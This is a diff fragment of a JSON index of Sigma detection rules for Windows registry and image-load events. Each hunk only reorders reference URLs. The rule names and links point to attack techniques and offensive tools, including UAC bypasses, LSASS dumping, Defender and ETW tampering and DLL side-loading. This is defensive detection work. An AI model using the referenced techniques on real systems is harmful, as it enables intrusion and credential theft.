 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml"
 ],
 "tags": [
@@ -16790,8 +16790,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
 "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml"
 ],
 "tags": [
@@ -16874,8 +16874,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
+ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_databases.yml"
 ],
 "tags": [
@@ -17013,8 +17013,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
 "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml"
 ],
 "tags": [
@@ -17049,9 +17049,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
- "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
 ],
 "tags": [
@@ -17166,13 +17166,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
- "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
+ "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
+ "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml"
 ],
 "tags": [
@@ -17308,8 +17308,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
+ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml"
 ],
 "tags": [
@@ -17491,9 +17491,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
- "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
 "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
+ "https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml"
 ],
 "tags": [
@@ -17758,10 +17758,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
 ],
 "tags": [
@@ -17819,8 +17819,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
 "https://github.com/hfiref0x/UACME",
+ "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml"
 ],
 "tags": [
@@ -17855,8 +17855,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
 "https://persistence-info.github.io/Data/hhctrl.html",
+ "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml"
 ],
 "tags": [
@@ -18075,8 +18075,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
 "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml"
 ],
 "tags": [
@@ -18166,8 +18166,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
 "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
+ "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"
 ],
 "tags": [
@@ -18313,8 +18313,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging",
 "https://persistence-info.github.io/Data/aedebug.html",
+ "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml"
 ],
 "tags": [
@@ -18388,9 +18388,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/deepinstinct/Lsass-Shtinkering",
- "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps",
 "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
+ "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml"
 ],
 "tags": [
@@ -18423,8 +18423,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
+ "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml"
 ],
@@ -18483,9 +18483,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute",
- "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
 "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623",
+ "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml"
 ],
 "tags": [
@@ -18519,8 +18519,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml"
 ],
 "tags": [
@@ -18575,9 +18575,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/jamieantisocial/status/1304520651248668673",
- "https://www.sans.org/cyber-security-summit/archives",
 "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
+ "https://www.sans.org/cyber-security-summit/archives",
+ "https://twitter.com/jamieantisocial/status/1304520651248668673",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml"
 ],
 "tags": [
@@ -18834,8 +18834,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd",
 "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml"
 ],
 "tags": [
@@ -18963,8 +18963,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
 "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml"
 ],
 "tags": [
@@ -18988,8 +18988,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/pabraeken/status/998627081360695297",
 "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files",
+ "https://twitter.com/pabraeken/status/998627081360695297",
 "https://twitter.com/VakninHai/status/1517027824984547329",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml"
 ],
@@ -19098,8 +19098,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml"
@@ -19158,9 +19158,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
 "https://unit42.paloaltonetworks.com/ransomware-families/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml"
 ],
 "tags": [
@@ -19191,8 +19191,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
+ "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml"
 ],
 "tags": [
@@ -19233,8 +19233,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
 "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml"
 ],
 "tags": [
@@ -19269,8 +19269,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
 "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml"
 ],
 "tags": [
@@ -19318,9 +19318,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
- "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
 "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
+ "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
+ "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml"
 ],
 "tags": [
@@ -19343,10 +19343,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
- "https://github.com/elastic/detection-rules/issues/1371",
 "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
+ "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
 "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
+ "https://github.com/elastic/detection-rules/issues/1371",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml"
 ],
 "tags": [
@@ -19437,8 +19437,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml"
 ],
@@ -19462,17 +19462,17 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://bunnyinside.com/?term=f71e8cb9c76a",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
 "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://bunnyinside.com/?term=f71e8cb9c76a",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml"
 ],
 "tags": [
@@ -19651,10 +19651,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/0gtweet/status/1468548924600459267",
- "https://github.com/gtworek/PSBits/tree/master/IFilter",
 "https://persistence-info.github.io/Data/ifilters.html",
+ "https://github.com/gtworek/PSBits/tree/master/IFilter",
 "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
+ "https://twitter.com/0gtweet/status/1468548924600459267",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml"
 ],
 "tags": [
@@ -19812,9 +19812,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
 "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html",
 "https://twitter.com/dez_/status/986614411711442944",
- "https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"
 ],
 "tags": [
@@ -19914,8 +19914,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt",
 "https://github.com/binderlabs/DirCreate2System",
+ "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml"
 ],
 "tags": [
@@ -19942,9 +19942,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/bohops/WSMan-WinRM",
- "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
 "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture",
+ "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
+ "https://github.com/bohops/WSMan-WinRM",
 "https://twitter.com/chadtilbury/status/1275851297770610688",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml"
 ],
@@ -20020,8 +20020,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add",
 "https://twitter.com/am0nsec/status/1412232114980982787",
+ "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml"
 ],
 "tags": [
@@ -20158,8 +20158,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/wdormann/status/1547583317410607110",
 "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC",
+ "https://twitter.com/wdormann/status/1547583317410607110",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"
 ],
 "tags": [
@@ -20226,8 +20226,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
+ "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml"
 ],
 "tags": [
@@ -20348,11 +20348,11 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
+ "https://github.com/Wh04m1001/SysmonEoP",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
 "https://decoded.avast.io/martinchlumecky/png-steganography/",
- "https://github.com/Wh04m1001/SysmonEoP",
 "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml"
 ],
 "tags": [
@@ -20467,8 +20467,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
 "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
+ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml"
 ],
 "tags": [
@@ -20553,10 +20553,10 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
 "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
 "https://hijacklibs.net/",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml"
 ],
 "tags": [
@@ -20801,8 +20801,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/tyranid/DotNetToJScript",
- "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
 "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
+ "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
 "https://thewover.github.io/Introducing-Donut/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"
 ],
@@ -20887,8 +20887,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/",
